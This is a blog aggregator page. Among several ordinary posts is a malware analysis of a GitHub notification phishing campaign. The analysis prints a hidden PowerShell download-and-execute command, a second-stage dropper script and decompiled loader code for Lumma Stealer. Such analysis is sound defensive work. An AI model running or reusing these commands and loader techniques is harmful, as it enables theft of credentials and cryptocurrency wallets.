Full Width [alt+shift+f] Shortcuts [alt+shift+k]
Sign Up [alt+shift+s] Log In [alt+shift+l]
10
Recently I found myself needing to generate a HTTPS Server Certificate and Private Key for an iOS app using OpenSSL, what surprised me was the total lack of documentation for OpenSSL. While there is plenty of function documentation, what OpenSSL really lacks is examples of how it all fits together. It's like having all of the pieces of a puzzle, but no picture of that the finished product will look like. Many online examples are insecure or make use of deprecated functions, a serious concern considering the consequences. This tutorial will cover the basics for how to generate a RSA or ECDSA Private Key and a X509 Server Certificate for your application in C. For this tutorial, we will be using OpenSSL 1.1.0f. Important note: This tutorial is written for the modern version of OpenSSL, 1.1.x, and is not backwards compatible with OpenSSL 1.0.x. If you are still on the 1.0.x train, it's highly recommended that you upgrade your application. Generating the Private Key A private key is...
over a year ago

Improve your reading experience

Logged in users get linked directly to articles resulting in a better reading experience. Please login for free, it takes less than 1 minute.

More from Ian's Blog

Hardware-Accelerated Video Encoding with Intel Arc on Redhat Linux

I've been wanting hardware-accelerated video encoding on my Linux machine for quite a while now, but ask anybody who's used a Linux machine and they'll tell you of the horrors of Nvidia or AMD drivers. Intel, on the other hand, seems to be taking things in a much different, much more positive direction when it comes to their Arc graphics cards. I've heard positive things from people who use them about the relativly painless driver experience, at least when compared to Nvidia. So I went out and grabbed a used Intel Arc A750 locally and installed it in my server running Rocky 9.4. This post is to document what I did to install the required drivers and support libraries to be able to encode videos with ffmpeg utilizing the hardware of the GPU. This post is specific to Redhat Linux and all Redhat-compatible distros (Rocky, Oracle, etc). If you're using any other distro, this post likely won't help you. Driver Setup The drivers for Intel Arc cards were added into the Linux Kernel in version 6.2 or later, but RHEL 9 uses kernel version 5. Thankfully, Intel provides a repo specific to RHEL 9 where they offer precompiled backports of the drivers against the stable kernel ABI of RHEL 9. Add the Intel Repo Add the following repo file to /etc/yum.repos.d. Note that I'm using RHEL 9.4 here. You will likely need to change 9.4 to whatever version you are using by looking in /etc/redhat-release. Update the baseurl value and ensure that URL exists. [intel-graphics-9.4-unified] name=Intel graphics 9.4 unified enabled=1 gpgcheck=1 baseurl=https://repositories.intel.com/gpu/rhel/9.4/unified/ gpgkey=https://repositories.intel.com/gpu/intel-graphics.key Run dnf clean all for good measure. Install the Software dnf install intel-opencl \ intel-media \ intel-mediasdk \ libmfxgen1 \ libvpl2 \ level-zero \ intel-level-zero-gpu \ mesa-dri-drivers \ mesa-vulkan-drivers \ mesa-vdpau-drivers \ libdrm \ mesa-libEGL \ mesa-lib Reboot your machine for good measure. Verify Device Availability You can verify that your GPU is seen using the following: clinfo | grep "Device Name" Device Name Intel(R) Arc(TM) A750 Graphics Device Name Intel(R) Arc(TM) A750 Graphics Device Name Intel(R) Arc(TM) A750 Graphics Device Name Intel(R) Arc(TM) A750 Graphics ffmpeg Setup Install ffmpeg ffmpeg needs to be compiled with libvpl support. For simplicities sake, you can use this pre-compiled static build of ffmpeg. Download the ffmpeg-master-latest-linux64-gpl.tar.xz binary. Verify ffmpeg support If you're going to use a different copy of ffmpeg, or compile it yourself, you'll want to verify that it has the required support using the following: ./ffmpeg -hide_banner -encoders|grep "qsv" V..... av1_qsv AV1 (Intel Quick Sync Video acceleration) (codec av1) V..... h264_qsv H.264 / AVC / MPEG-4 AVC / MPEG-4 part 10 (Intel Quick Sync Video acceleration) (codec h264) V..... hevc_qsv HEVC (Intel Quick Sync Video acceleration) (codec hevc) V..... mjpeg_qsv MJPEG (Intel Quick Sync Video acceleration) (codec mjpeg) V..... mpeg2_qsv MPEG-2 video (Intel Quick Sync Video acceleration) (codec mpeg2video) V..... vp9_qsv VP9 video (Intel Quick Sync Video acceleration) (codec vp9) If you don't have any qsv encoders, your copy of ffmpeg isn't built correctly. Converting a Video I'll be using this video from the Wikimedia Commons for reference, if you want to play along at home. This is a VP9-encoded video in a webm container. Let's re-encode it to H.264 in an MP4 container. I'll skip doing any other transformations to the video for now, just to keep things simple. ./ffmpeg -i Sea_to_Sky_Highlights.webm -c:v h264_qsv Sea_to_Sky_Highlights.mp4 The key parameter here is telling ffmpeg to use the h264_qsv encoder for the video, which is the hardware-accelerated codec. Let's see what kind of difference using hardware acceleration makes: Encoder Time Average FPS h264_qsv (Hardware) 3.02s 296 libx264 (Software) 1m2.996s 162 Using hardware acceleration sped up this operation by 95%. Naturally your numbers won't be the same as mine, as there's lots of variables at play here, but I feel this is a good demonstration that this was a worthwhile investment.

4 months ago 19 votes
Having a Website Used to Be Fun

According to the Wayback Machine, I launched my website over a decade ago, in 2013. Just that thought alone makes me feel old, but going back through the old snapshots of my websites made me feel a profound feeling of longing for a time when having a website used to be a novel and enjoyable experience. The Start Although I no longer have the original invoice, I believe I purchased the ianspence.com domain in 2012 when I was studying web design at The Art Institute of Vancouver. Yes, you read that right, I went to art school. Not just any, mind you, but one that was so catastrophically corrupt and profit-focused that it imploded as I was studying there. But thats a story for another time. I obviously didn't have any real plan for what I wanted my website to be, or what I would use it for. I simply wanted a web property where I could play around with what I was learning in school and expand my knowledge of PHP. I hosted my earliest sites from a very used Dell Optiplex GX280 tower in my house on my residential internet. Although the early 2010's were a rough period of my life, having my very own website was something that I was proud of and deeply enjoyed. Somewhere along the way, all that enjoyment was lost. And you don't have to take my own word for it. Just compare my site from 2013 to the site from when I wrote this post in 2024. Graphic Design was Never My Passion 2013's website has an animated carousel of my photography, bright colours, and way too many accordions. Everything was at 100% because I didn't really care about so much about the final product more as I was just screwing around and having fun. 2024's website is, save for the single sample of my photography work, a resume. Boring, professional, sterile of anything resembling personality. Even though the style of my site became more and more muted over the years, I continued to work and build on my site, but what I worked on changed as what I was interested in grew. In the very early 2010s I thought I wanted to go into web design, but after having suffered 4 months of the most dysfunctional Art school there is, I realized that maybe it was web development that interested me. That, eventually, grew into the networking and infrastructure training I went through, and the career I've built for myself. Changing Interests As my interests changed, my focus on the site became less about the design and appearance and more towards what was serving the site itself. My site literally moved out from the basement suite I was living in to a VPS, running custom builds of PHP and Apache HTTPD. At one point, I even played around with load-balancing between my VPS and my home server, which had graduated into something much better than that Dell. Or, at least until my internet provider blocked inbound port 80. This is right around when things stopped being fun anymore. When Things Stopped Being Fun Upon reflection, there were two big mistakes I made that stole all of the enjoyment out of tinkering with my websites: Cloudflare and Scaling. Cloudflare A dear friend of mine (that one knows I'm referring to it) introduced me to Cloudflare sometime in 2014, which I believe was the poison pill that started my journey into taking the fun out of things for me. You see, Cloudflare is designed for big businesses or people with very high traffic websites. Neither of which apply to me. I was just some dweeb who liked PHP. Cloudflare works by sitting between your website's hosting server and your visitors. All traffic from your visitors flows through Cloudflare, where they can do their magic. When configured properly, the original web host is effectively hidden from the web, as people have to go through Cloudflare first. This was the crux of my issues, at least with the focus of this blog post, with Cloudflare. For example, before Lets Encrypt existed, Cloudflare did not allow for TLS at all on their free plans. This was right at the time when I was just starting to learn about TLS, but because I had convinced myself that I had to use Cloudflare, I could never actually use it on my website. This specific problem of TLS never went away, either, as even though Cloudflare now offers free TLS - they have total control over everything and they have the final say in what is and isn't allowed. The problems weren't just TLS, of course, because if you wanted to handle non-HTTP traffic then you couldn't use Cloudflare's proxy. Once again, I encountered the same misguided fear that exposing my web server to the internet was a recipe for disaster. Scaling (or lack thereof) The other, larger, mistake I made was an obsession with scaling and security. Thanks to my education I had learned a lot about enterprise networking and systems administration, and I deigned to apply those skills to my own site. Aggressive caching, using global CDNs, monitoring, automated deployments, telemetry, obsession over response times, and probably more I'm not remembering. All for a mostly static website for a dork that had maybe 5 page views a month. This is a mistake that I see people make all the time, not even just exclusive for websites - people think that they need to be concerned about scaling problems without first asking if those problems even or will ever apply to them. If I was able to host my website from an abused desktop tower with blown caps on cable internet just fine, then why in the world would I need to be obsessing over telemetry and response times. Sadly things only got even worse when I got into cybersecurity, because now on top of all the concerns with performance and scale, I was trying to protect myself from exceedingly unlikely threats. Up until embarrassingly recently I was using complicated file integrity checks using hardware-backed cryptographic keys to ensure that only I could make changes to the content of my site. For some reason, I had built this threat model in my head where I needed to protect against malicious changes on an already well-protected server. All of this created an environment where making any change at all was a cumbersome and time-consuming task. Is it any wonder why I ended up making my site look like a resume when doing any changes to it was so much work? The Lesson I Learned All of this retrospective started because of the death of Cohost, as many of the folks there (myself included) decided to move to posting on their own blogs. This gave me a great chance to see what some of my friends were doing with their sites, and unlocking fond memories of back in 2012 and 2013 when I too was just having fun with my silly little website. All of this led me down to the realization of the true root cause of my misery: In an attempt to try and mimic what enterprises do with their websites in terms of stability and security, I made it difficult to make any changes to my site. Realizing this, I began to unravel the design and decisions I had made, and come up with a much better, simpler, and most of all enjoyable design. How my Website Used to Work The last design of my website that existed before I came to the conclusions I discussed above was as follows: My website was a packaged Docker container image which ran nginx. All of the configuration and static files were included in the image, so theoretically it could run anywhere. That image was being run on Azure Container Instances, a managed container platform, with the image hosted on Azure Container Registries. Cloudflare sat in-front of my website and proxied all connections to it. They took care of the domain registration, DNS, and TLS. Whenever I wanted to make changes to my site, I would create a container image, sign it using a private key on my YubiKey, and push that to Github. A Github action would then deploy that image to Azure Container Registries and trigger the container to restart, pulling the new image. How my Website Works Now Now that you've seen the most ridiculous design for some dork's personal website, let me show you how it works now: Yes, it's really that simple. My websites are now powered by a virtual machine with a public IP address. When users visit my website, they talk directly to that virtual machine. When I want to make changes to my website, I just push them directly to that machine. TLS certificates are provided by Lets Encrypt. I still use Cloudflare as my domain registrar and DNS provider, but - crucially - nothing is proxied through Cloudflare. When you loaded this blog post, your browser talked directly to my server. It's almost virtually identical to the way I was doing things in 2013, and it's been almost invigorating to shed this excess weight and unnecessary complications. But there's actually a whole lot going on behind the scenes that I'm omitting from this graph. Static Websites Are Boring A huge problem with my previous design is that I had locked myself into only having a pure static website, and static websites are boring! Websites are more fun when they can, you know, do things, and doing things with static websites is usually dependent on Javascript and doing them in the users browser. That's lame. Let's take a really simple example: Sometimes I want to show a banner on the top of my website. In a static-only website, unless you hard-code that banner into the HTML, doing this from a static site would require that you use JavaScript to check some backend if a banner should be displayed, and if so - render it. But on a dynamic page? Where server-side rendering is used? This is trivially easy. A key change with my new website is switching away from using containers, which are ephemeral and immutable, over to using a virtual machine, which isn't, and to go back to server-side rendering. I realized that a lot of the fun I was having back then was because PHP is server-side, and you can do a lot of wacky things when you have total control over the server! I'm really burying the lede here, but my new site is powered not by nginx, or httpd, but instead my own web server. Entirely custom and designed for tinkering and hacking. Combined with no longer having to deal with Cloudflare, has given me total control to do whatever the hell I want. Maybe I'll do another post some day talking about this - but I've written enough about websites for one day. Wrapping Up That feeling of wanting to do whatever the hell I want really does sum up the sentiment I've come to over the past few weeks. This is my website. I should be able to do whatever I want with it, free from my self-imposed judgement or concern over non-issues. Kill the cop in your head that tells you to share the concerns that Google has. You're not Google. Websites should be fun. Enterprise tools like Cloudflare and managed containers aren't.

4 months ago 19 votes
GitHub Notification Emails Hijacked to Send Malware

As an open source developer I frequently get emails from GitHub, most of these emails are notifications sent on behalf of GitHub users to let me know that somebody has interacted with something and requires my attention. Perhaps somebody has created a new issue on one of my repos, or replied to a comment I left, or opened a pull request, or perhaps the user is trying to impersonate GitHub security and trick me into downloading malware. If that last one sounds out of place, well, I have bad news for you - it's happened to me. Twice. In one day. Let me break down how this attack works: The attacker, using a throw-away GitHub account, creates an issue on any one of your public repos The attacker quickly deletes the issue You receive a notification email as the owner of the repo You click the link in the email, thinking it's legitimate You follow the instructions and infect your system with malware Now, as a savvy computer-haver you might think that you'd never fall for such an attack, but let me show you all the clever tricks employed here, and how attackers have found a way to hijack GitHub email system to send malicious emails directly to project maintainers. To start, let's look at the email message I got: In text form (link altered for your safety): Hey there! We have detected a security vulnerability in your repository. Please contact us at [https://]github-scanner[.]com to get more information on how to fix this issue. Best regards, Github Security Team Without me having already told you that this email is a notification about a new GitHub issue being created on my repo, there's virtually nothing to go on that would tell you that, because the majority of this email is controlled by the attacker. Everything highlighted in red is, in one way or another, something the attacker can control - meaning the text or content is what they want it to say: Unfortunately the remaining parts of the email that aren't controlled by the attacker don't provide us with any sufficient amount of context to know what's actually going on here. Nowhere in the email does it say that this is a new issue that has been created, which gives the attacker all the power to establish whatever context they want for this message. The attacker impersonates the "Github Security Team", and because this email is a legitimate email sent from Github, it passes most of the common phishing checks. The email is from Github, and the link in the email goes to where it says it does. GitHub can improve on these notification emails to reduce the effectiveness of this type of attack by providing more context about what action is the email for, reducing the amount of attacker-controlled content, and improving clarity about the sender of the email. I have contacted Github security (the real one, not the fake imposter one) and shared these emails with them along with my concerns. The Website If you were to follow through with the link on that email, you'd find yourself on a page that appears to have a captcha on it. Captcha-gated sites are annoyingly common, thanks in part to services like Cloudflare which offers automated challenges based on heuristics. All this to say that users might not find a page immediately demanding they prove that they are human not that out of the ordinary. What is out of the ordinary is how the captcha works. Normally you'd be clicking on a never-ending slideshow of sidewalks or motorcycles as you definitely don't help train AI, but instead this site is asking you to take the very specific step of opening the Windows Run box and pasting in a command. Honestly, if solving captchas were actually this easy, I'd be down for it. Sadly, it's not real - so now let's take a look at the malware. The Malware The site put the following text in my clipboard (link modified for your safety): powershell.exe -w hidden -Command "iex (iwr '[https://]2x[.]si/DR1.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: 93752" We'll consider this stage 1 of 4 of the attack. What this does is start a new Windows PowerShell process with the window hidden and run a command to download a script file and execute it. iex is a built-in alias for Invoke-Expression, and iwr is Invoke-WebRequest. For Linux users out there, this is equal to calling curl | bash. A comment is at the end of the file that, due to the Windows run box being limited in window size, effectively hides the first part of the script, so the user only sees this: Between the first email I got and the time of writing, the URL in the script have changed, but the contents remain the same. Moving onto the second stage, the contents of the evaluated script file are (link modified for your safety): $webClient = New-Object System.Net.WebClient $url1 = "[https://]github-scanner[.]com/l6E.exe" $filePath1 = "$env:TEMP\SysSetup.exe" $webClient.DownloadFile($url1, $filePath1) Start-Process -FilePath $env:TEMP\SysSetup.exe This script is refreshingly straightforward, with virtually no obfuscation. It downloads a file l6E.exe, saves it as <User Home>\AppData\Local\Temp\SysSetup.exe, and then runs that file. I first took a look at the exe itself in Windows Explorer and noticed that it had a digital signature to it. The certificate used appears to have come from Spotify, but importantly the signature of the malicious binary is not valid - meaning it's likely this is just a spoofed signature that was copied from a legitimately-signed Spotify binary. The presence of this invalid codesigning signature itself is interesting, because it's highlighted two weaknesses with Windows that this malware exploits. I would have assumed that Windows would warn you before it runs an exe with an invalid code signature, especially one downloaded from the internet, but turns out that's not entirely the case. It's important to know how Windows determines if something was downloaded from the internet, and this is done through what is commonly called the "Mark of the Web" (or MOTW). In short, this is a small flag set in the metadata of the file that says it came from the internet. Browsers and other software can set this flag, and other software can look for that flag to alter settings to behave differently. A good example is how Office behaves with a file downloaded from the internet. If you were to download that l6E.exe file in your web browser (please don't!) and tried to open it, you'd be greeted with this hilariously aged dialog. Note that at the bottom Windows specifically highlights that this application does not have a valid signature. But this warning never appears for the victim, and it has to do with the mark of the web. Step back for a moment and you'll recall that it's not the browser that is downloading this malicious exe, instead it's PowerShell - or, more specifically, it's the System.Net.WebClient class in .NET Framework. This class has a method, DownloadFile which does exactly that - downloads a file to a local path, except this method does not set the MOTW flag for the downloaded file. Take a look at this side by side comparison of the file downloaded using the same .NET API used by the malware on the left and a browser on the right: This exposes the other weakness in Windows; Windows will only warn you when you try to run an exe with an invalid digital signature if that file has the mark of the web. It is unwise to rely on the mark of the web in any way, as it's trivially easy to remove that flag. Had the .NET library set that flag, the attacker could have easily just removed it before starting the process. Both of these weaknesses have been reported to Microsoft, but for us we should stop getting distracted by code signing certificates and instead move on to looking at what this dang exe actually does. I opened the exe in Ghidra and then realized that I know nothing about assembly or reverse engineering, but I did see mentions of .NET in the output, so I moved to dotPeek to see what I could find. There's two parts of the code that matter, the entrypoint and the PersonalActivation method. The entrypoint hides the console window, calls PersonalActivation twice in a background thread, then marks a region of memory as executable with VirtualProtect and then executes it with CallWindowProcW. private static void Main(string[] args) { Resolver resolver = new Resolver("Consulter", 100); Program.FreeConsole(); double num = (double) Program.UAdhuyichgAUIshuiAuis(); Task.Run((Action) (() => { Program.PersonalActivation(new List<int>(), Program.AIOsncoiuuA, Program.Alco); Program.PersonalActivation(new List<int>(), MoveAngles.userBuffer, MoveAngles.key); })); Thread.Sleep(1000); uint ASxcgtjy = 0; Program.VirtualProtect(ref Program.AIOsncoiuuA[0], Program.AIOsncoiuuA.Length, 64U, ref ASxcgtjy); int index = 392; Program.CallWindowProcW(ref Program.AIOsncoiuuA[index], MoveAngles.userBuffer, 0, 0, 0); } The PersonalActivation function takes in a list and two byte arrays. The list parameter is not used, and the first byte array is a data buffer and the second is labeled as key - this, plus the amount of math they're doing, gives it away that is is some form of decryptor, though I'm not good enough at math to figure out what algorithm it is. I commented out the two calls to VirtualProtect and CallWindowProcW and compiled the rest of the code and ran it in a debugger, so that I could examine the contents of the two decrypted buffers. The first buffer contains a call to CreateProcess 00000000 55 05 00 00 37 13 00 00 00 00 00 00 75 73 65 72 U...7.......user 00000010 33 32 2E 64 6C 6C 00 43 72 65 61 74 65 50 72 6F 32.dll.CreatePro 00000020 63 65 73 73 41 00 56 69 72 74 75 61 6C 41 6C 6C cessA.VirtualAll 00000030 6F 63 00 47 65 74 54 68 72 65 61 64 43 6F 6E 74 oc.GetThreadCont 00000040 65 78 74 00 52 65 61 64 50 72 6F 63 65 73 73 4D ext.ReadProcessM 00000050 65 6D 6F 72 79 00 56 69 72 74 75 61 6C 41 6C 6C emory.VirtualAll 00000060 6F 63 45 78 00 57 72 69 74 65 50 72 6F 63 65 73 ocEx.WriteProces 00000070 73 4D 65 6D 6F 72 79 00 53 65 74 54 68 72 65 61 sMemory.SetThrea 00000080 64 43 6F 6E 74 65 78 74 00 52 65 73 75 6D 65 54 dContext.ResumeT 00000090 68 72 65 61 64 00 39 05 00 00 BC 04 00 00 00 00 hread.9...¼..... 000000A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000B0 00 00 00 00 00 00 43 3A 5C 57 69 6E 64 6F 77 73 ......C:\Windows 000000C0 5C 4D 69 63 72 6F 73 6F 66 74 2E 4E 45 54 5C 46 \Microsoft.NET\F 000000D0 72 61 6D 65 77 6F 72 6B 5C 76 34 2E 30 2E 33 30 ramework\v4.0.30 000000E0 33 31 39 5C 52 65 67 41 73 6D 2E 65 78 65 00 37 319\RegAsm.exe.7 [...] And the second buffer, well, just take a look at the headers you might just see what's going on :) 00000000 4D 5A 78 00 01 00 00 00 04 00 00 00 00 00 00 00 MZx............. 00000010 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 ............x... 00000040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ..º..´.Í!¸.LÍ!Th 00000050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno 00000060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 00000070 6D 6F 64 65 2E 24 00 00 50 45 00 00 4C 01 04 00 mode.$..PE..L... So now we know that the large byte arrays at the top of the code are an "encrypted" exe that this loader puts into memory, marks it as executable, and then executes it. Marvelous. Sadly, this is where I hit a wall as my skills at reverse engineering applications are very limited. The final stage of the attack is a Windows exe, but not one made with .NET, and I don't really know what I'm looking at in the output from Ghidra. Thankfully, however, actual professionals have already done the work for me! Naturally, I put both the first and second binaries into VirusTotal and found that they were already flagged by a number of AVs. A common pattern in the naming was "LUMMASTEALER", which gives us our hint as to what this malware is. Lumma is one of many malware operations (read: gangs) that offer a "malware as a service" product. Their so-called "stealer" code searches through your system for cryptocurrency wallets, stored credentials, and other sensitive data. This data is then sent to their command-and-control (C2) servers where the gang can then move on to either stealing money from you, or profit from selling your data online. Lumma's malware tends to not encrypt victims devices such as traditional ransomware operations do. For more information I recommend this excellent write-up from Cyfirma. If you made it this far, thanks for reading! I had a lot of fun looking into the details of this attack, ranging from the weakness in Github's notification emails to the multiple layers of the attack. Some of the tools I used to help me do this analysis were: Windows Sandbox Ghidra dotPeek HxD Visual Studio Updates: Previously I said that the codesigning certificate was stolen from Spotify, however after discussing my findings with DigiCert we agreed that this is not the case and rather that the signature is being spoofed.

5 months ago 11 votes
Mourning the Loss of Cohost

The staff running Cohost have announced (archived) that at the end of 2024 Cohost will be shutting down, with the site going read-only on October 1st 2024. This news was deeply upsetting to receive, as Cohost filled a space left by other social media websites when they stopped being fun and became nothing but tools of corporations. Looking Back I joined Cohost in October of 2022 when it was still unclear if elon musk would go through with his disastrous plan to buy twitter. The moment that deal was confirmed, I abandoned my Twitter account and switched to using Cohost only for a time and never looked back once. I signed up for Cohost Plus! a week later after seeing the potential for what Cohost could become, and what it could mean for a less commercial future. I believed in Cohost. I believed that I could be witness to the birth of a better web, not built on advertising, corporate greed, privacy invasion - but instead on a focus of people, the content they share, and the communities they build. The loss of Cohost is greater than just the loss of the community of friends I've made, it's the dark cloud that has now formed over people who shared their vision, the rise of the question of "why bother". When I look back to my time on twitter, I'm faced with mixed feelings. I dearly miss the community that I had built there - some of us scattered to various places, while others decided to take their leave entirely from social media. I am sad knowing that, despite my best efforts of trying to maintain the connections I've made, I will lose touch with my friends because there is no replacement for Cohost. Although I miss my friends from twitter, I've come to now realize how awful twitter was for me and my well-being. It's funny to me that back when I was using twitter, I and seemingly everybody else knew that twitter was a bad place, and yet we all continued to use it. Even now, well into its nazi bar era, people continue to use it. Cohost showed what a social media site could be if the focus was not on engagement, but on the community. The lack of hard statistics like follower or like count meant that Cohost could never be a popularity contest - and that is something that seemingly no other social media site has come to grips with. The Alternatives Many people are moving, or have already moved, to services like Mastodon and Bluesky. While I am on Mastodon, these services have severe flaws that make them awful as a replacement for Cohost. Mastodon is a difficult to understand web of protocols, services, terminology, and dogma. It suffers from critical "open source brain worm" where libertarian ideals take priority over important safety and usability aspects, and I do not see any viable way to resolve these issues. Imagine trying to convince somebody who isn't technical to "join mastodon". How are they ever going to understand the concept of decentralization, or what an instance is, or who runs the instance, or what client to use, or even what "fediverse" means? This insurmountable barrier ensures that only specific people are taking part in the community, and excludes so many others. Bluesky is the worst of both worlds of being both technically decentralized while also very corporate. It's a desperate attempt to clone twitter as much as possible without stopping for even a moment to evaluate if that includes copying some of twitter's worst mistakes. Looking Forward When it became clear that I was going to walk away from my twitter account there was fear and anxiety. I knew that I would lose connections, some of which I had to work hard to build, but I had to stick to my morals. In the end, things turned out alright. I found a tight-nit community of friends in a private Discord server, found more time to focus on my hobbies and less on doomscrolling, and established this very blog. I know that even though I am very sad and very angry about Cohost, things will turn out alright. So long, Cohost, and thank you, Jae, Colin, Aiden, and Kara for trying. You are all an inspiration to not just desire a better world, but to go out and make an effort to build it. I'll miss you, eggbug.

5 months ago 8 votes
Why my Apps Aren't Available on Apple Vision Pro

Recently I have received some questions from users of both TLS Inspector and DNS Inspector enquiring why the apps aren't available on Apple's new Vision Pro headset. While I have briefly discussed this over on my Mastodon, I figured it might be worthwhile putting things down with a bit more permanence. There are two main reasons why I am not making these apps available on the platform: exclusivity and support. A Future of Computing, If You Can Afford It. Apple loudly and proudly calls their new headset the future of computing, marshalling us into the age of spatial computing. However at US$3,500 some (myself) would say that this future is only available to those who can afford it. Three thousand five hundred dollars is, in no small terms, a lot of money for those on budget, and firmly places this item in the category of being an expensive toy. TLS and DNS Inspector are free apps that I spend a great deal of effort making available to as many people as possible. I work to ensure that the apps function on the oldest supported iOS versions so that those who can't afford a new smartphone every year can still use my apps. Ultimately it comes down to a choice: do I work to support legacy devices & versions so help more people who can't afford expensive upgrades, or do I support a grossly expensive toy-like device for people who have more money than sense. To me, I think the answer is Pretty Fucking Obvious. I personally do not currently care that the app is unavailable on these platforms, but if you already have one and are bothered by this, you can afford to donate to me to convince me it's a worthwhile investment. If you have enough money to buy an expensive toy, you have enough money to support a free & open source tool. Supporting a Device I Don't Own When Apple launched the Vision Pro they only made it available in the US market. Apple has a tendency to do this, and it's always felt like a weird decision. Why launch a "great" new product if the majority of the world can't actually buy it? If you ask me, sure does have a strong whiff of American elitism to it. This is what US$3,500 gets you. Image: Apple. Despite this, I saw other Canadians race down across the line to buy a new headset. A year later, Apple made the Vision Pro available in a few more markets, including Canada, at CA$5000. Five thousand dollars. If you didn't already know, supporting TLS and DNS Inspector does, in fact cost me money. At a minimum I have to spend CA$100 a year on an Apple developer membership, plus the cost of a suitable macOS device to build the software. I am happy to spend this money to support the community of users of my app, but CA$5,000 is so far beyond what I am capable of spending on something I already know I won't use outside of development. The Vision Pro, like all other VR devices, do not interest me. I've played around with a friends VR headset and found it to be novel, but not groundbreaking enough to be worth the cost. Also like other VR devices, there is a major lack of content available for it. Most of the VR games are either also playable outside of VR, or glorified tech demos desperately trying to distract you from your buyers remorse. Apple is also struggling with this issue for their Vision Pro, and in their first year of its existence so far all they've really been able to muster is spatial video. Something to entertain you for a few minutes, maybe an hour, before the headset goes in a box to sit unused. What will Change My Mind As it stands, the way I see it there are only two things that will change my mind on this: The price of the Vision Pro is cut by at least 50% Somebody gives me a Vision Pro I think we all know that #1 is never going to happen, so if you feel so strongly enough that TLS and DNS Inspector need to be on the Vision Pro, you can email me to discuss your donation of a device ;)

7 months ago 10 votes

More in technology

On Lenny’s Podcast

One of my must-read newsletters for the past several years has been Lenny’s Newsletter, probably best known for its writing on growth and product management, which really means it covered everything you need to create a great company. It expanded into a really well-done podcast; Lenny has always had a knack for finding the best … Continue reading On Lenny’s Podcast →

14 hours ago 3 votes
Apple’s new iPads are here, let’s break them down

Another day, another opportunity to rate my 2025 Apple predictions! iPad Here’s what I predicted would happen with the base iPad this year: I fully expect to see the 11th gen iPad in 2025, and I think it will come with a jump to the A17 Pro or

11 hours ago 2 votes
A lightweight file server running entirely on an Arduino Nano ESP32

Home file servers can be very useful for people who work across multiple devices and want easy access to their documents. And there are a lot of DIY build guides out there. But most of them are full-fledged NAS (network-attached storage) devices and they tend to rely on single-board computers. Those take a long time […] The post A lightweight file server running entirely on an Arduino Nano ESP32 appeared first on Arduino Blog.

14 hours ago 2 votes
The battle of the budget phones

Just days after I got my iPhone 16e, Apple’s (less) budget (than ever before) iPhone, Nothing is out here with new their new budget phones, the Phone (3a) and (3a) Pro. These models start at $379 and $459 respectively, so they certainly undercut the new iPhone, so let&

14 hours ago 2 votes
The New Leverage: AI and the Power of Small Teams

This weekend, a small team in Latvia won an Oscar for a film they made using free software. That’s not just cool — it’s a sign of what’s coming. Sunday night was family movie night in my home. We picked a recent movie, FLOW. I’d heard good things about it and thought we’d enjoy it. What we didn’t know was that as we watched, the film won this year’s Academy Award as best animated feature. Afterwards, I saw this post from the movie’s director, Gints Zilbalodis: We established Dream Well Studio in Latvia for Flow. This room is the whole studio. Usually about 4-5 people were working at the same time including me. I was quite anxious about being in charge of a team, never having worked in any other studios before, but it worked out. pic.twitter.com/g39D6YxVWa — Gints Zilbalodis (@gintszilbalodis) January 26, 2025 Let that sink in: 4-5 people in a small room in Latvia led by a relatively inexperienced director used free software to make a movie that as of February 2025 had earned $20m and won an Oscar. I know it’s a bit more involved than that, but still – quite an accomplishment! But not unique. Billie Eilish and her brother Phineas produced her Grammy-winning debut album When We All Fall Asleep, Where Do We Go? in their home studio. And it’s not just cultural works such as movies and albums: small teams have built hugely successful products such as WhatsApp and Instagram. As computers and software get cheaper and more powerful, people can do more with less. And “more” here doesn’t mean just a bit better (pardon the pun) – it means among the world’s best. And as services and products continue migrating from the world of atoms to the world of bits, creators’ scope of action grows. This trend isn’t new. But with AI in the mix, things are about to go into overdrive. Zilbalodis and his collaborators could produce their film because someone else built Blender; they worked within its capabilities and constraints. But what if their vision exceeded what the software can do? Just a few years ago, the question likely wouldn’t even come up. Developing software calls for different abilities. Until recently, a small team had to choose: either make the movie or build the tools. AI changes that, since it enables small teams to “hire” virtual software developers. Of course, this principle extends beyond movies: anything that can be represented symbolically is in scope. And it’s not just creative abilities, such as writing, playing music, or drawing, but also more other business functions such as scheduling, legal consultations, financial transactions, etc. We’re not there yet. But if trends hold, we’ll soon see agent-driven systems do for other kinds of businesses what Blender did for Dream Well Studio. Have you dreamed of making a niche digital product to scratch an itch? That’s possible now. Soon, you’ll be able to build a business around it quickly, easily, and without needing lots of other humans in the mix. Many people have lost their jobs over the last three years. Those jobs likely won’t be replaced with AIs soon. But job markets aren’t on track to stability. If anything, they’re getting weirder. While it’s early days, AI promises some degree of resiliency. For people with entrepreneurial drive, it’s an exciting time: we can take ideas from vision to execution faster, cheaper, and at greater scale than ever. For others, it’ll be unsettling – or outright scary. We’re about to see a major shift in who can create, innovate, and compete in the market. The next big thing might not come from a giant company, but from a small team – or even an individual – using AI-powered tools. I expect an entrepreneurial surge driven by necessity and opportunity. How will you adapt?

20 hours ago 2 votes